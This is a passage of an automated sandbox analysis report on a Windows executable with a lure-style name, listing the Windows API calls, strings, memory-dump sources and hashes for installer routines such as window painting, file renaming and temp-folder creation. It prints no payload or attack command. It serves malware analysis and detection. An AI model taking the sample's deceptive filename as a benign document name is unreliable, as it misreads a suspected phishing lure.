                                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045DE
                                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045EC
                                                                        • lstrlenW.KERNEL32(?), ref: 004045F1
                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004045FE
                                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404613
                                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040466C
                                                                        • SendMessageW.USER32(00000000), ref: 00404673
                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040469E
                                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046E1
                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004046EF
                                                                        • SetCursor.USER32(00000000), ref: 004046F2
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0040470B
                                                                        • SetCursor.USER32(00000000), ref: 0040470E
                                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040473D
                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040474F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                        • String ID: : Completed$N$gD@
                                                                        • API String ID: 3103080414-1696006015
                                                                        • Opcode ID: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                        • Instruction ID: c6d0c18f0759a08483bb7b351ebc970df30fae26c4fd20534e815ca7361c8267
                                                                        • Opcode Fuzzy Hash: c2a8691b99c0880d176a200d2dcbd178e790d1d94455f1632e384604a8e92c19
                                                                        • Instruction Fuzzy Hash: FB6171B1900209BFDF10AF64DD85AAA7B69FB85314F00813AFA05B72D0D7789D51DB98
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                        • DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                        • String ID: F
                                                                        • API String ID: 941294808-1304234792
                                                                        • Opcode ID: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                        • Instruction ID: d01d0d5cc9b133415a9533ecc51a0e37331fb978861fbb258d472761deeb6ec3
                                                                        • Opcode Fuzzy Hash: 80cfb8c675e835c75fd7954a1f24ba06797c47b4a778c986a5d394adc8f03950
                                                                        • Instruction Fuzzy Hash: 80418C71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB34D955DFA4
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061C2,?,?), ref: 00406062
                                                                        • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 0040606B
                                                                          • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E46
                                                                          • Part of subcall function 00405E36: lstrlenA.KERNEL32(00000000,?,00000000,0040611B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
                                                                        • GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 00406088
                                                                        • wsprintfA.USER32 ref: 004060A6
                                                                        • GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 004060E1
                                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060F0
                                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406128
                                                                        • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 0040617E
                                                                        • GlobalFree.KERNEL32(00000000), ref: 0040618F
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406196
                                                                          • Part of subcall function 00405ED1: GetFileAttributesW.KERNELBASE(00438800,00403055,00438800,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                          • Part of subcall function 00405ED1: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                        • String ID: %ls=%ls$[Rename]
                                                                        • API String ID: 2171350718-461813615
                                                                        • Opcode ID: 29587da316c6c599c0e1183c46a51f077245d4dc447ecd9698dd2c76f7489909
                                                                        • Instruction ID: 12f543f5511dcafe86fd679503ff52a70677b7710d95204b96aa1b9436a2079a
                                                                        • Opcode Fuzzy Hash: 29587da316c6c599c0e1183c46a51f077245d4dc447ecd9698dd2c76f7489909
                                                                        • Instruction Fuzzy Hash: AD310271200715BFC2206B659D48F2B3AACDF41714F16003ABD86BA2D3DA3DAD1186BD
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 004066ED
                                                                        • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 004066FC
                                                                        • CharNextW.USER32(?,00000000,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406701
                                                                        • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe",0040346A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00406714
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040668B
                                                                        • "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe", xrefs: 0040668A
                                                                        • *?|<>/":, xrefs: 004066DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: "C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 589700163-1382521964
                                                                        • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                        • Instruction ID: c93b7236ce9398e1af64c827f7f3df25a4e663042e3c0a86589bb20fd507ce77
                                                                        • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                                                        • Instruction Fuzzy Hash: 6111CB2580061195DB3037548C84B7762E8EF547A4F52443FED86B32C0E77D5CA286BD
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 004043B5
                                                                        • GetSysColor.USER32(00000000), ref: 004043F3
                                                                        • SetTextColor.GDI32(?,00000000), ref: 004043FF
                                                                        • SetBkMode.GDI32(?,?), ref: 0040440B
                                                                        • GetSysColor.USER32(?), ref: 0040441E
                                                                        • SetBkColor.GDI32(?,?), ref: 0040442E
                                                                        • DeleteObject.GDI32(?), ref: 00404448
                                                                        • CreateBrushIndirect.GDI32(?), ref: 00404452
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                        • Instruction ID: 9b2ff1ab0d94660d7576f8ed4a98babdba82e7b09994482354a54f078556bf7c
                                                                        • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                                                        • Instruction Fuzzy Hash: 9B2162715007089BCB20DF38D948B5BBBF8AF80714B04892EE996A26E1D734E904CF59
                                                                        APIs
                                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                                                          • Part of subcall function 00405FB2: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FC8
                                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                        • String ID: 9
                                                                        • API String ID: 163830602-2366072709
                                                                        • Opcode ID: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                        • Instruction ID: 536e03bdd217ed40317c2037eab2912bbb9466327a1cdf3ab0e42e9fe4cfd002
                                                                        • Opcode Fuzzy Hash: 763497bc60046be8c663aa09794d62d552ffb55bb47a76c8d3cda0648ce56c07
                                                                        • Instruction Fuzzy Hash: 2751F975D00219EBDF20DF95CA89AAEBB79FF04304F50817BE501B62D0E7B49D828B58
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D07
                                                                        • GetMessagePos.USER32 ref: 00404D0F
                                                                        • ScreenToClient.USER32(?,?), ref: 00404D29
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D3B
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                        • Instruction ID: 38a9b76ebff3d9b0285b36f379b71c5e366e7bff37b4726e352de3fe70b617dc
                                                                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                        • Instruction Fuzzy Hash: DF014C71900219BBDB10DBA4DD85BFEBBB8AF95B11F10012BBA50B61C0D6B49A058BA5
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                                                        • MulDiv.KERNEL32(0000FA00,00000064,000AF598), ref: 00402F74
                                                                        • wsprintfW.USER32 ref: 00402F84
                                                                        • SetWindowTextW.USER32(?,?), ref: 00402F94
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 00402F7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                        • Instruction ID: f70e2e9d3cdf76f376be3492476da2a97ecf935c4d8f5b4406c9d83c61a08eb5
                                                                        • Opcode Fuzzy Hash: fdbbe4e25b196e951a31d1700121d0a4c19e0197fdf79c60d2d61a266d2935a7
                                                                        • Instruction Fuzzy Hash: F7014470640209BBEF209F60DE4AFEA3B79FB44345F008039FA06A51D1DBB989559F5C
                                                                        APIs
                                                                        • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405955
                                                                        • GetLastError.KERNEL32 ref: 00405969
                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040597E
                                                                        • GetLastError.KERNEL32 ref: 00405988
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405938
                                                                        • C:\Users\user\Desktop, xrefs: 00405912
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000447000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078765137.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_Image_Product_Inquiry_Request_Villoslada.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                        • API String ID: 3449924974-1521822154
                                                                        • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                        • Instruction ID: dda0a131242ff184f2ccb02743bd446f17612fd9a9d8f3d2581d745ec2ea809b
                                                                        • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                                                        • Instruction Fuzzy Hash: 010108B1C00219EADF009BA0C944BEFBBB4EB04364F00803AD945B6180D77996488FA9
                                                                        APIs
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 0040299B
                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029B7
                                                                        • GlobalFree.KERNEL32(?), ref: 004029F0
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402A03
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402A1B
                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402A2F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2078423542.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2078405508.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078442214.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2078459290.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
